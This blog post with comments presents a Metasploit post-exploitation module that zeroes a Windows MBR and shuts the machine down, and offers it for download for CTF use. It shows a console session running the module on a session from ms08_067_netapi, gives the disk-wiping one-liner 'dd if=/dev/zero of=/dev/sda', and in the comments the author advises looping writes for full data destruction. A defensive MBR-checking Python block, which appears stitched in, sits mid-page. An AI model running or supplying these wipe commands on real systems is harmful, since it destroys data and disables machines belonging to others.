System Kill

Most Metasploit modules are intended to be as "safe" as possible: get access to a system and pull information from it, ideally without causing any serious crashes, which is exactly what you want in a pen test. But if you're in a CTF or another competition, sometimes you are finished with the system you're on and just want to trash it. So when I saw jcran's competition modules, which include a wonderful rickroll module, I dug up my system kill script, which starts a disk reformat (it overwrites the MBR and partition tables with zeros) and shuts down the system. You can download it here: kill.rb. Running it looks like this:

meterpreter >
Background session 1? [y/N]
msf exploit(ms08_067_netapi) > use post/windows/kill
msf post(kill) > set SESSION 1
msf post(kill) > run

[*] Wiped MBR
[*] Shutting down
[*] Post module execution completed
msf post(kill) > [*] Meterpreter session 1 closed. Reason: Died

At which point, when the system is powered on, you will see a message like "FATAL: No bootable medium found! System halted." or maybe "No Operating System found." or some other wonderful message. Enjoy.

(of course, on *nix you can just dd if=/dev/zero of=/dev/sda and wait for things to start dying)
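A defender's view of what the module leaves behind, as an added example that is not the post's kill.rb: a parser for the first sector, a check that classifies it as intact, damaged or zeroed (the zeroed case is why the BIOS reports no bootable medium), and a testdisk-style signature scan showing the volume data is still exactly where it was. The disk image and the minimal NTFS boot record are constructed in-line for the example.

```python
import struct

SECTOR = 512
BOOT_SIG = b"\x55\xaa"          # bytes 510-511 of a valid MBR or volume boot record
NTFS_OEM = b"NTFS    "          # OEM ID at bytes 3-10 of an NTFS volume boot record

def parse_mbr(sector: bytes) -> dict:
    """Check the boot signature and decode the four 16-byte partition entries at offset 446."""
    if len(sector) != SECTOR:
        raise ValueError("MBR must be exactly 512 bytes")
    parts = []
    for i in range(4):
        status, ptype, lba, count = struct.unpack("<B3xB3xII", sector[446 + 16 * i:462 + 16 * i])
        if ptype:                   # type 0 means an unused slot
            parts.append({"bootable": status == 0x80, "type": ptype, "lba": lba, "sectors": count})
    return {"signature_ok": sector[510:] == BOOT_SIG, "partitions": parts}

def assess_mbr(sector: bytes) -> str:
    """'zeroed' is what the module leaves behind: no 0x55AA, so the BIOS reports no bootable medium."""
    if not any(sector):
        return "zeroed"
    info = parse_mbr(sector)
    return "intact" if info["signature_ok"] and info["partitions"] else "damaged"

def find_ntfs_volumes(image: bytes) -> list:
    """testdisk-style recovery: ignore the MBR and scan every sector for a volume signature."""
    hits = []
    for lba in range(len(image) // SECTOR):
        sec = image[lba * SECTOR:(lba + 1) * SECTOR]
        if sec[3:11] == NTFS_OEM and sec[510:] == BOOT_SIG:
            hits.append(lba)
    return hits

def build_mbr(entries) -> bytes:
    """Constructed sample MBR (bootstrap area left zero); entries are (bootable, type, lba, sectors)."""
    sec = bytearray(SECTOR)
    for i, (bootable, ptype, lba, count) in enumerate(entries):
        sec[446 + 16 * i:462 + 16 * i] = struct.pack("<B3xB3xII", 0x80 if bootable else 0, ptype, lba, count)
    sec[510:] = BOOT_SIG
    return bytes(sec)

# Constructed 8-sector disk image: MBR, three empty sectors, a minimal NTFS boot record at LBA 4, then data.
NTFS_LBA = 4
NTFS_VBR = bytes(3) + NTFS_OEM + bytes(SECTOR - 13) + BOOT_SIG
INTACT_IMAGE = build_mbr([(True, 0x07, NTFS_LBA, 4)]) + bytes(3 * SECTOR) + NTFS_VBR + bytes(3 * SECTOR)
# The same image after its first sector has been overwritten with zeros, which is all the module does.
WIPED_IMAGE = bytes(SECTOR) + INTACT_IMAGE[SECTOR:]
```

On the wiped image the MBR check reports "zeroed" while the signature scan still finds the volume at LBA 4, which is what makes gpart/testdisk recovery possible.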

  1. #1 by Kevin on May 28, 2011 - 3:51 pm

    Cool, thanks for posting. The good thing about this script is that you really didn’t delete any information, simply made it so that the BIOS and the bootloader can’t find the operating system.

    As for the dd command you mentioned, they call it “Data Destroyer” for a reason 😉

  2. #2 by scriptjunkie on May 31, 2011 - 12:00 am

    Yes, if you really want to destroy the data, you can put the write into a loop. As it is, it just whacks the MBR/partition tables, which can be recovered, e.g. with gpart, in case you accidentally do this to yourself.

  3. #3 by mshenrick on September 9, 2011 - 8:13 pm

    So it only destroys the MBR and partition table? Would that mean it would be trivial to recover it with testdisk, right, ’cos the data’s still there? (but most Windows users don’t know that)

    • #4 by scriptjunkie on September 9, 2011 - 8:36 pm

      Right, like I told Kevin, you can loop it for full destruction. This is faster and should be enough for a CTF, and if you realize later that, oh no, I needed a file off that box, you can still get it later, albeit with some hassle.

  4. #5 by TeNeX on July 15, 2013 - 4:58 am

    Well, the github site requires a password 🙁
    So this is a post-exploitation module, and it sounds nice 🙂 but maybe building a loop to write zeros to the HD sounds better 😛

    • #6 by scriptjunkie on July 15, 2013 - 10:58 pm

      The github link must have changed; I updated it and it should work now. I thought about doing a loop; it would be easy to edit to do that, but I think the single write is good enough and quick, although possible to recover from.
